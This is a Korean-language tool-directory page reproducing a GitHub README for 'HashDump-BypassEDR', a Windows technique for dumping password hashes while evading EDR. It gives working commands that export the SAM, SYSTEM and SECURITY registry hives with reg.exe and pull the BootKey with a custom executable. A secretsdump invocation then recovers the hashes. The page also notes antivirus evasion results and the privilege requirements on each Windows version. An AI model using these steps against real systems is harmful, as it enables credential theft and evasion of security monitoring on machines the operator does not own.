Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
HashDump-BypassEDR — Windows绕过EDR实现DumpHash | Kitploit
도구/GitHubGitHub/aabysszg/hashdump-bypassedr
Password AttacksHash AnalysisIDS/IPS EvasionPost-ExploitationPenetration TestingRed Teaming
GitHubaabysszg/hashdump-bypassedr

HashDump-BypassEDR

Windows绕过EDR实现DumpHash

저장소 보기
2513222일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

HashDump-BypassEDR

1# 프로젝트 개요

시스템 화이트 프로그램 Reg.exe의 확장 적용을 통해 백신 소프트웨어의 차단 지점을 교묘하게 우회하여 EDR을 우회하고 Hash를 덤프하는 목적을 달성했습니다.

실제 테스트에 따르면 이 방법은 Windows 계열 시스템에 유효하며, 조작 난이도가 높지 않고 실전 가치가 있습니다.

이 프로젝트의 실전 관련 글:

  • EDR을 우회하여 DumpHash 구현하기-AabyssZG'Blog
  • EDR을 우회하여 DumpHash 구현하기-국가 네트워크 공간 보안 클라우드 커뮤니티

글 게시 후 국내 및 해외 커뮤니티에서 동일한 아이디어를 찾지 못해 전 세계 최초 게시라고 생각했지만, 이후 팬들의 댓글에 따르면 이 아이디어는 이전에 해외 고수분이 공유한 적이 있습니다: Dumping LSA secrets: a story about task decorrelation

이 글의 소스 코드와 Release는 Github에 공개되어 있습니다. 공유가 쉽지 않으니, 괜찮다고 생각되시는 고수님들은 Star를 눌러주시면 정말 감사하겠습니다!

2# 핵심 단계

2.1 1단계: reg 파일 내보내기

대상 시스템에서 명령을 실행하여 .reg 파일을 내보냅니다

root@kitploit:~
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg

2.2 2단계: 로컬 시스템에서 바이너리 복원

1단계에서 내보낸 .reg 파일을 로컬 시스템에 다운로드한 후, 본 프로젝트의 RegReduction.ps1 PowerShell 스크립트를 실행하여 바이너리 파일을 복원합니다

root@kitploit:~
.\RegReduction.ps1

참고: Github에서 스크립트를 다운로드하면 기본 인코딩이 UTF-8이므로, 메모장에서 ANSI(GB2312)로 변경해야 정상적으로 실행할 수 있습니다

powershell.png

2.3 3단계: BootKey 획득

대상 시스템에서 BootKey.exe 실행 프로그램을 실행합니다. 소스 코드는 본 프로젝트의 BootKey.c 파일입니다

root@kitploit:~
BootKey.exe

BootKey.png

백신 우회 테스트(2026.5.10): www.virustotal.com

Virustotal.png

2.4 4단계: secretsdump로 Hash 획득

root@kitploit:~
python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

HashOut.png

3# 권한 설명

이 글에는 몇 가지 핵심 작업이 있는데, 대상 시스템에서의 핵심 단계는 두 가지입니다:

  • reg.exe export 명령을 사용하여 주요 레지스트리 내용을 내보냅니다;
  • BootKey.exe를 사용하여 시스템의 BootKey를 내보냅니다.

다양한 시스템에서도 테스트를 진행했으며, 결과는 다음과 같습니다:

  • 실제 테스트에서 Win10, Win11 및 Windows Server 2025 환경에서는 reg.exe export 명령으로 레지스트리를 내보내려면 SYSTEM 권한이 필요하며, Windows Server 2022 이하 환경에서는 reg.exe export 명령으로 레지스트리를 내보낼 때 일반 관리자 권한만 있으면 됩니다(SYSTEM 권한은 필요 없음). reg.exe export 명령으로 레지스트리를 내보낸 후 파일 크기가 1KB에 불과하다면 권한이 부족하다는 뜻입니다.
  • 실제 테스트에서 BootKey.exe 추출 프로그램으로 BootKey를 내보낼 때는 관리자 권한이 필요 없으며, 실제로 대부분의 백신 소프트웨어(현재까지 접한 백신은 모두)가 탐지하지 않습니다.

🙏 4# 도움을 주신 여러 고수님들께 감사드립니다

Stargazers

Stargazers repo roster for @AabyssZG/HashDump-BypassEDR

Forkers

Forkers repo roster for @AabyssZG/HashDump-BypassEDR

Star History

Star History Chart

도구 다운로드